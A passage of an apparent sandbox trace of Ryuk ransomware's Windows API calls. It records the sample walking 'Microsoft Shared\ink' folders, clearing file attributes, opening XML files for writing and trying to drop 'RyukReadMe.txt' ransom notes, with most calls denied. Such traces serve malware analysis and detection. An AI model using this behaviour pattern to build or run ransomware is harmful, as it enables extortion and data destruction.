[0161.269] GetLastError () returned 0x5 [0161.269] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.270] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.270] SetLastError (dwErrCode=0x0) [0161.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.270] GetLastError () returned 0x5 [0161.270] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.270] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.270] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.270] SetLastError (dwErrCode=0x0) [0161.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.270] GetLastError () returned 0x5 [0161.270] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.270] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.270] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", dwFileAttributes=0x80) returned 0 [0161.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.271] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.271] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.271] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.271] SetLastError (dwErrCode=0x0) [0161.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.271] GetLastError () returned 0x5 [0161.271] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.271] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", dwFileAttributes=0x80) returned 0 [0161.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.272] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.272] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.272] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.272] SetLastError (dwErrCode=0x0) [0161.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.272] GetLastError () returned 0x5 [0161.272] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.272] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.272] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.272] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.272] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.272] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", dwFileAttributes=0x80) returned 0 [0161.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.273] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.273] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.273] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", dwFileAttributes=0x80) returned 0 [0161.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.273] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.274] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.274] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", dwFileAttributes=0x80) returned 0 [0161.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.274] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.274] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.274] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.274] SetLastError (dwErrCode=0x0) [0161.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.274] GetLastError () returned 0x5 [0161.274] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.274] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.274] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.275] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", dwFileAttributes=0x80) returned 0 [0161.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.275] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.275] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.275] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.275] SetLastError (dwErrCode=0x0) [0161.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.275] GetLastError () returned 0x5 [0161.275] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.275] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.275] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2f40 [0161.276] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.276] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", dwFileAttributes=0x80) returned 0 [0161.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.276] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.276] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.277] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", dwFileAttributes=0x80) returned 0 [0161.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.277] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.277] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.277] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", dwFileAttributes=0x80) returned 0 [0161.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.278] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.278] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", dwFileAttributes=0x80) returned 0 [0161.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.278] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.278] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", dwFileAttributes=0x80) returned 0 [0161.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.283] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.283] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.284] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", dwFileAttributes=0x80) returned 0 [0161.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.284] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.284] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.284] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", dwFileAttributes=0x80) returned 0 [0161.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.285] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.285] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.285] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", dwFileAttributes=0x80) returned 0 [0161.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.285] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.286] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", dwFileAttributes=0x80) returned 0 [0161.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.286] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.286] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", dwFileAttributes=0x80) returned 0 [0161.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.287] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.287] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.287] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", dwFileAttributes=0x80) returned 0 [0161.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.287] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.287] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.287] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", dwFileAttributes=0x80) returned 0 [0161.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.288] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.288] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.288] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0161.288] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", dwFileAttributes=0x80) returned 0 [0161.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.288] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.288] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.289] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0161.289] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0161.289] SetLastError (dwErrCode=0x0) [0161.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.292] GetLastError () returned 0x5 [0161.292] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0161.292] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.292] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.292] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", dwFileAttributes=0x80) returned 0 [0161.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 